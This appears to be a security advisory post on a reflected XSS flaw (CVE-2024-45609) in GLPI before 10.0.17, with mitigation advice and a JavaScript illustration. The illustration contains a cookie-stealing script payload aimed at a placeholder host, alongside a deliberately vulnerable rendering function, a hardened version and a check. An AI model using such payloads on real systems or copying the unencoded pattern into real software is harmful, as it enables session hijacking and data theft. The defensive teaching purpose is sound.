GLPI (CVE-2024-45609): Reflected XSS Vulnerability

2024-11-20


A reflected Cross-Site Scripting (XSS) vulnerability (CVE-2024-45609) has been identified in GLPI, a widely used open-source IT asset and service management application. An unauthenticated attacker can craft a malicious link and send it to a GLPI technician; when the technician opens it while logged in, the injected script runs in the technician's authenticated browser session. From there the attacker can read data the technician can see, perform actions with the technician's privileges, or deface the page content. Because the payload travels in the link rather than being stored in GLPI, the attack requires a victim to click, but it needs no account on the target instance.

Vulnerability Details:

Platform: GLPI
Affected versions: all releases before 10.0.17
Vulnerability: Reflected XSS (CVE-2024-45609)
Severity: Medium (CVSS v3.1 score 6.5); some sources list it as High (7.8 on the CVSS v2 scale). Ratings differ by source, so weigh the actual conditions: no authentication needed, but a logged-in technician must open the crafted link.
Date: November 15, 2024 (published)

Mitigation:

Upgrade to GLPI version 10.0.17 or later. This is the actual fix; the items below are defence in depth and do not remove the vulnerability on an unpatched instance.

For any GLPI plugins or custom pages you maintain yourself, validate input on the server side and, more importantly for XSS, HTML-encode untrusted values at the point of output, using the encoding appropriate to the context (HTML body, attribute, JavaScript, URL) in which they are rendered.
Deploy a Content Security Policy (CSP) that does not allow inline scripts, so that the browser refuses to execute an injected script even if an encoding bug remains. Roll it out in Content-Security-Policy-Report-Only mode first, since web applications that rely on inline scripts will break under an enforced policy.
Train technicians, who are the targets here, to treat unexpected links to the GLPI instance with suspicion, especially links arriving by e-mail or chat that carry long or encoded query strings.
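The following is an added illustration and not GLPI's own code: a minimal search page that reflects a query parameter, first unencoded (the reflected XSS pattern described above), then with contextual HTML encoding and a CSP header, plus a small check a practitioner can run against a response body to confirm that a fix or upgrade actually stops the reflection. All function names, the /search page, the attacker.example host and the payload are hypothetical and constructed for this example.

```javascript
// Added illustration, not GLPI's code. All names below are hypothetical.

// Constructed attacker payload, of the kind that would ride in a link sent to a
// technician. It closes the attribute it lands in, then drops a script that sends
// document.cookie to a host the attacker controls (attacker.example is a placeholder).
const PAYLOAD =
  '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable: the query parameter is interpolated verbatim into HTML, so the
// browser parses the attacker's markup as part of the page.
function renderSearchVulnerable(query) {
  return [
    "<html><body><h1>Search results</h1>",
    `<p>You searched for: ${query}</p>`,
    `<input name="q" value="${query}">`,
    "</body></html>",
  ].join("\n");
}

// Output encoding for the HTML text and quoted-attribute contexts: every character
// the HTML parser could interpret is replaced by its entity reference.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same page, but untrusted data is encoded at the point of output.
function renderSearchHardened(query) {
  const safe = escapeHtml(query);
  return [
    "<html><body><h1>Search results</h1>",
    `<p>You searched for: ${safe}</p>`,
    `<input name="q" value="${safe}">`,
    "</body></html>",
  ].join("\n");
}

// Defence in depth: a CSP without 'unsafe-inline' makes the browser refuse any
// inline <script> that an encoding bug might still let through. Ship it as
// Content-Security-Policy-Report-Only first; pages relying on inline scripts break.
function buildCsp() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
    "frame-ancestors 'self'",
  ].join("; ");
}

// Response headers the hardened handler would send with the page.
function hardenedHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": buildCsp(),
  };
}

// Verification check after an upgrade or fix: does the raw payload come back
// unencoded in the response body? True means the reflection is still exploitable.
function reflectsUnescaped(html, payload) {
  return html.includes(payload);
}

// Side-by-side comparison of both renderings for the constructed payload.
function demo() {
  const vulnerable = renderSearchVulnerable(PAYLOAD);
  const hardened = renderSearchHardened(PAYLOAD);
  return {
    vulnerableReflects: reflectsUnescaped(vulnerable, PAYLOAD), // true
    hardenedReflects: reflectsUnescaped(hardened, PAYLOAD), // false
    vulnerable,
    hardened,
  };
}

const result = demo();
console.log("--- vulnerable ---\n" + result.vulnerable);
console.log("--- hardened ---\n" + result.hardened);
console.log("reflected unencoded (vulnerable):", result.vulnerableReflects);
console.log("reflected unencoded (hardened):  ", result.hardenedReflects);
```

The encoding step is what removes the vulnerability; the CSP only limits the damage if encoding is missed somewhere. The reflectsUnescaped check is deliberately crude (a substring match) and is meant as a quick post-upgrade smoke test, not as a scanner: a reflection that survives in a different context (inside a script block or a URL) needs the encoding appropriate to that context, which a plain substring test will not reveal.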

What Undercode Says:

This reflected XSS in GLPI is a moderate risk for organizations running vulnerable versions: it needs a technician to open a crafted link, but it needs no account and lands in a privileged session. Upgrading to 10.0.17 or later is the fix and should be scheduled promptly. Output encoding in any code you maintain, a tested Content Security Policy, and technician awareness of suspicious links reduce the impact of this and similar issues but do not replace the upgrade.

References:

Reported By: Nvd.nist.gov
Undercode AI: https://ai.undercodetesting.com
